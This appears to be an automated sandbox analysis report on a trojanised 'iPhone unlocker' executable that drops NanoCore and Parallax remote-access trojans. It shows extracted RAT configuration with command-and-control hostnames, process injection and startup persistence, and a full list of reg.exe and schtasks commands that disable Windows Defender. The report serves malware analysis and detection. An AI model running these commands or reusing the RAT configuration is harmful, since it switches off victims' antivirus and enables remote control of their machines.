Analysis
-
max time kernel
138s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
16-01-2023 21:46
Static task
static1
Behavioral task
behavioral1
Sample
F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
Resource
win7-20221111-en
General
-
Target
F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
-
Size
16.0MB
-
MD5
0f007d899ab6ef50e71a1acfd1ab4147
-
SHA1
6cbb099844201db58f34f41720b001f6e10d6197
-
SHA256
f816ea850eca0a23b99541054eddc2ac01971bb502dcf1231dc02ed58282365f
-
SHA512
a49c5898e060c0bf5e35608740c2317283e6f13d6f70bc62b1648689e7ba19e83d3c8b179aa1f37b0a57469edc75e30b1d0f93b4b065f361627a6e64065bc91c
-
SSDEEP
393216:T3HBq+lXKkz4XNC6JMxBEMYUUwE+hxRgNqw+VNdT0Qxq+I:jVdxwNC6JgBEIzD/gkfVPZVI
Malware Config
Extracted
nanocore
1.2.2.0
allonsy.hopto.org:54999
grosjeangerard.hopto.org:54999
4e2053ac-25a8-4992-bc5f-78bde39f716d
-
activate_away_mode
true
-
backup_connection_host
grosjeangerard.hopto.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2020-01-18T20:19:32.705027836Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
54999
-
default_group
NARATION
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
4e2053ac-25a8-4992-bc5f-78bde39f716d
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
allonsy.hopto.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
ParallaxRat payload 7 IoCs
Detects payload of Parallax Rat, a small portable Rat usually digitally signed with a Sectigo certificate.
resource yara_rule behavioral1/memory/668-127-0x0000000000400000-0x000000000042B000-memory.dmp parallax_rat behavioral1/memory/668-128-0x0000000000400000-0x000000000042B000-memory.dmp parallax_rat behavioral1/memory/668-131-0x0000000000400000-0x000000000042B000-memory.dmp parallax_rat behavioral1/memory/668-132-0x0000000000400000-0x000000000042B000-memory.dmp parallax_rat behavioral1/memory/668-133-0x000000000040A478-mapping.dmp parallax_rat behavioral1/memory/668-126-0x0000000000400000-0x000000000042B000-memory.dmp parallax_rat behavioral1/memory/668-144-0x0000000000400000-0x000000000042B000-memory.dmp parallax_rat -
Executes dropped EXE 9 IoCs
pid Process 892 PassFabiPhone.exe 1736 NanWin.exe 1716 ParaWin.exe 616 iphone-unlocker.exe 588 iphone-unlocker.tmp 1124 NanWin.exe 1148 NanWin.exe 1740 NanWin.exe 1864 NanWin.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe ParaWin.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe ParaWin.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe NanWin.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe NanWin.exe -
Loads dropped DLL 16 IoCs
pid Process 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 616 iphone-unlocker.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NanWin.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NanWin.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1716 set thread context of 668 1716 ParaWin.exe 58 PID 1736 set thread context of 1148 1736 NanWin.exe 69 PID 1740 set thread context of 1864 1740 NanWin.exe 71 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 1716 ParaWin.exe 1716 ParaWin.exe 1716 ParaWin.exe 1716 ParaWin.exe 1716 ParaWin.exe 1716 ParaWin.exe 1716 ParaWin.exe 1716 ParaWin.exe 1716 ParaWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1736 NanWin.exe 1148 NanWin.exe 1148 NanWin.exe 1148 NanWin.exe 1740 NanWin.exe 1740 NanWin.exe 1740 NanWin.exe 1740 NanWin.exe 1740 NanWin.exe 1740 NanWin.exe 1740 NanWin.exe 1740 NanWin.exe 1740 NanWin.exe 1864 NanWin.exe 1864 NanWin.exe 1864 NanWin.exe 1864 NanWin.exe 1864 NanWin.exe 1864 NanWin.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1864 NanWin.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1148 NanWin.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1716 ParaWin.exe Token: SeDebugPrivilege 1736 NanWin.exe Token: SeDebugPrivilege 1148 NanWin.exe Token: SeDebugPrivilege 1148 NanWin.exe Token: SeDebugPrivilege 1740 NanWin.exe Token: SeDebugPrivilege 1864 NanWin.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1320 wrote to memory of 892 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 28 PID 1320 wrote to memory of 892 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 28 PID 1320 wrote to memory of 892 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 28 PID 1320 wrote to memory of 892 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 28 PID 1320 wrote to memory of 1736 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 30 PID 1320 wrote to memory of 1736 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 30 PID 1320 wrote to memory of 1736 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 30 PID 1320 wrote to memory of 1736 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 30 PID 1320 wrote to memory of 1716 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 31 PID 1320 wrote to memory of 1716 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 31 PID 1320 wrote to memory of 1716 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 31 PID 1320 wrote to memory of 1716 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 31 PID 1320 wrote to memory of 1716 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 31 PID 1320 wrote to memory of 1716 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 31 PID 1320 wrote to memory of 1716 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 31 PID 892 wrote to memory of 536 892 PassFabiPhone.exe 34 PID 892 wrote to memory of 536 892 PassFabiPhone.exe 34 PID 892 wrote to memory of 536 892 PassFabiPhone.exe 34 PID 892 wrote to memory of 536 892 PassFabiPhone.exe 34 PID 536 wrote to memory of 776 536 cmd.exe 32 PID 536 wrote to memory of 776 536 cmd.exe 32 PID 536 wrote to memory of 776 536 cmd.exe 32 PID 1320 wrote to memory of 616 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 33 PID 1320 wrote to memory of 616 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 33 PID 1320 wrote to memory of 616 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 33 PID 1320 wrote to memory of 616 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 33 PID 1320 wrote to memory of 616 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 33 PID 1320 wrote to memory of 616 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 33 PID 1320 wrote to memory of 616 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe 33 PID 536 wrote to memory of 1648 536 cmd.exe 35 PID 536 wrote to memory of 1648 536 cmd.exe 35 PID 536 wrote to memory of 1648 536 cmd.exe 35 PID 616 wrote to memory of 588 616 iphone-unlocker.exe 36 PID 616 wrote to memory of 588 616 iphone-unlocker.exe 36 PID 616 wrote to memory of 588 616 iphone-unlocker.exe 36 PID 616 wrote to memory of 588 616 iphone-unlocker.exe 36 PID 616 wrote to memory of 588 616 iphone-unlocker.exe 36 PID 616 wrote to memory of 588 616 iphone-unlocker.exe 36 PID 616 wrote to memory of 588 616 iphone-unlocker.exe 36 PID 536 wrote to memory of 1708 536 cmd.exe 37 PID 536 wrote to memory of 1708 536 cmd.exe 37 PID 536 wrote to memory of 1708 536 cmd.exe 37 PID 536 wrote to memory of 1044 536 cmd.exe 38 PID 536 wrote to memory of 1044 536 cmd.exe 38 PID 536 wrote to memory of 1044 536 cmd.exe 38 PID 536 wrote to memory of 680 536 cmd.exe 39 PID 536 wrote to memory of 680 536 cmd.exe 39 PID 536 wrote to memory of 680 536 cmd.exe 39 PID 536 wrote to memory of 1100 536 cmd.exe 40 PID 536 wrote to memory of 1100 536 cmd.exe 40 PID 536 wrote to memory of 1100 536 cmd.exe 40 PID 536 wrote to memory of 1092 536 cmd.exe 41 PID 536 wrote to memory of 1092 536 cmd.exe 41 PID 536 wrote to memory of 1092 536 cmd.exe 41 PID 536 wrote to memory of 2008 536 cmd.exe 42 PID 536 wrote to memory of 2008 536 cmd.exe 42 PID 536 wrote to memory of 2008 536 cmd.exe 42 PID 536 wrote to memory of 916 536 cmd.exe 43 PID 536 wrote to memory of 916 536 cmd.exe 43 PID 536 wrote to memory of 916 536 cmd.exe 43 PID 536 wrote to memory of 1596 536 cmd.exe 44 PID 536 wrote to memory of 1596 536 cmd.exe 44 PID 536 wrote to memory of 1596 536 cmd.exe 44 PID 536 wrote to memory of 1048 536 cmd.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe"C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1343.tmp\1344.tmp\1345.bat C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:1648
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:1708
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:1044
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:680
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1100
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1092
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2008
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:916
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1596
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:1048
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:1900
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:1732
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:968
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:1944
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:1084
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:1324
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:1568
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:1276
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:1588
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:1728
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:1016
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:1836
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:1372
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:1476
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:292
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:1700
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:912
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:428
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:1092
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:1696
-
-
-
-
C:\Users\Admin\AppData\Roaming\NanWin.exe"C:\Users\Admin\AppData\Roaming\NanWin.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Users\Admin\AppData\Roaming\NanWin.exe"C:\Users\Admin\AppData\Roaming\NanWin.exe"3⤵
- Executes dropped EXE
PID:1124
-
-
C:\Users\Admin\AppData\Roaming\NanWin.exe"C:\Users\Admin\AppData\Roaming\NanWin.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
PID:1148 -
C:\Users\Admin\AppData\Roaming\NanWin.exe"C:\Users\Admin\AppData\Roaming\NanWin.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740 -
C:\Users\Admin\AppData\Roaming\NanWin.exe"C:\Users\Admin\AppData\Roaming\NanWin.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\ParaWin.exe"C:\Users\Admin\AppData\Roaming\ParaWin.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵PID:668
-
-
-
C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Users\Admin\AppData\Local\Temp\is-MFPSU.tmp\iphone-unlocker.tmp"C:\Users\Admin\AppData\Local\Temp\is-MFPSU.tmp\iphone-unlocker.tmp" /SL5="$90122,15327349,546304,C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"3⤵
- Executes dropped EXE
PID:588
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f1⤵PID:776
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD535b74dad14475b9684b5afa31b75f3fa
SHA159c915df0361253e87d8e7fc24a7f45215949f44
SHA2569d2bfa4eb93d0026edafa2f6fdc06faa591be4334f739adae413247a7019fe8b
SHA51285383abab6052210425db6d6b139e504a786765dd7cb085991f8867c45932ab1a98bdfe77d737751c551b9c6c25de0d9fb5d9d41375deca43da327c306239590
-
Filesize
1.5MB
MD5844384b7d563f094910e2b986ded3320
SHA1df9661693cb55116b653dba682aa9819bee59849
SHA2566eec90877ed23e5c8136c5d774ab13db441ae51730450b2fc15ef3d1ed8e982f
SHA512a90a260c369158a8e55c460c60fe9ee92b8e36a8a839e7a0e6d5a17887e1166bd2b163a56fbbce330b0b3cd1209d711031d1303402e178837de5e4f230c62a4f
-
Filesize
216B
MD5f2f3e7fbcd24813c3e4987d9389c3f23
SHA1c9878bc25efc8a6dcbf499473825ab1f0d40275f
SHA256c13850de467f6c87883cddc56b0f7bb1424314e817e5679d8dbe8ff734c56d7e
SHA512cf3080d70d852e8683e935de28aa9b4cab920521f2a4174b7f025ea51b202998c55d958332b1d988bae4797a10f0ad5c5b194a3a02ec4f185f9f89baf1a3bfcc
-
Filesize
8B
MD5fae9e2521fda5a362c0031aba2d8c651
SHA111f2d7219d19e06f98413cdb65177ed5d74bd5d3
SHA256eca39e9d9adb1a3f77a5f1eea697b4307d54fb356d4a14c68588e756f5c607ee
SHA51294ee3b4eb0885e326cee5108bf1b2a0106e1a506b79338162eb8ff621b05c9a941859d443248bbe8d67160bf4eb915fc925bdb3a9dc9ee18647c43df4e8dd9ff
-
Filesize
293KB
MD5187462c6b61de77ca73e201101000759
SHA1a179615db6c0a2d1e9d9122bc8f9fe6cf3302280
SHA256de1fe9adcc339eec3316cb7d70bd63d695bcc017aacea188dd5eecc53b95a50a
SHA512b15641554bf613d1e292c36faca9daa22289f25a8feba5471dd1d75bc71282768e2008c360e209beabe6472f4d44a3dd208d2dc2bba2797a1fd7c4ab112f89a8
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
SHA256a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
SHA5122fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
-
Filesize
412KB
MD5f128341e5efb8a7b4684f14ca94dddb9
SHA1b53b0998b127738a37296d641971b82bf5434658
SHA256267cd1c9e1bf7396cf4dd89702849cb5e74e53693ebcf45c65b63d7490975b6b
SHA51233a657c40ec921bc663cf4a06e50c1cbafa70a68af4e93a18718d76277f86258e09104b29afe62e5432e7a60f41e009ba7c66c3320dacf169fbe2c4d2959a814
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
SHA256a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
SHA5122fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
SHA256a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
SHA5122fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
SHA256a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
SHA5122fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
SHA256a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
SHA5122fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
SHA256a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
SHA5122fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
SHA256a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
SHA5122fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
-
Filesize
335KB
MD50335dc59409a50d9dd55bf2c103be4a3
SHA174a326b31f47b5acce81d057345379296efb3a8c
SHA256829b0a54123b9105d688a6592ddf830f798f467c536c9f0833c7d4c0ae02d9a7
SHA512ebf2022a8c71d46249d2ff3a2f54712e623697bff5614e24d8d06551ed332cb43af2fc3dd06490b26d9f484e99bb4579e07fad8c3a7c19a9d101a06244e7ca59
-
Filesize
335KB
MD50335dc59409a50d9dd55bf2c103be4a3
SHA174a326b31f47b5acce81d057345379296efb3a8c
SHA256829b0a54123b9105d688a6592ddf830f798f467c536c9f0833c7d4c0ae02d9a7
SHA512ebf2022a8c71d46249d2ff3a2f54712e623697bff5614e24d8d06551ed332cb43af2fc3dd06490b26d9f484e99bb4579e07fad8c3a7c19a9d101a06244e7ca59
-
Filesize
20.0MB
MD58c5dd78ab39b61f7d55b15bb283df424
SHA1cd695484bdb7fbce5cd223159fbdd36a336f4914
SHA2565769ccef917fe78906c41ae332f08429401798483fa47a61fd8f90c77a2a3ce8
SHA512f9b063c91baf3548448ce2476337789d591e88d376a3c7530fd36006980a1a0fea23b6298d50e3264ff25507d337a54d8db4910a1754be2c7701f4f27a7cc423
-
Filesize
15.1MB
MD548c26c1d7339c99e2c0dbba5af874176
SHA1547a9984003102d58dacc176621ce00d09e00728
SHA25694ea3520cfba9ac746b552df843e682cf6d2b11627759a216bd83aa95714c782
SHA512d42d9bf7ca36268f3ee75234f61b36ed720fe25e3c0fe322531c3dace91d33b5f5b37ab7ba2cf76c46dfdb04341e8ae01961280e7ded14d92e9609197da8861e
-
Filesize
15.1MB
MD548c26c1d7339c99e2c0dbba5af874176
SHA1547a9984003102d58dacc176621ce00d09e00728
SHA25694ea3520cfba9ac746b552df843e682cf6d2b11627759a216bd83aa95714c782
SHA512d42d9bf7ca36268f3ee75234f61b36ed720fe25e3c0fe322531c3dace91d33b5f5b37ab7ba2cf76c46dfdb04341e8ae01961280e7ded14d92e9609197da8861e
-
Filesize
1.5MB
MD5844384b7d563f094910e2b986ded3320
SHA1df9661693cb55116b653dba682aa9819bee59849
SHA2566eec90877ed23e5c8136c5d774ab13db441ae51730450b2fc15ef3d1ed8e982f
SHA512a90a260c369158a8e55c460c60fe9ee92b8e36a8a839e7a0e6d5a17887e1166bd2b163a56fbbce330b0b3cd1209d711031d1303402e178837de5e4f230c62a4f
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
SHA256a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
SHA5122fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
-
Filesize
412KB
MD5610696767503d1e65a0f00892ae76748
SHA1f4c666cb6e6f85c702173eebfe0fedb74061f755
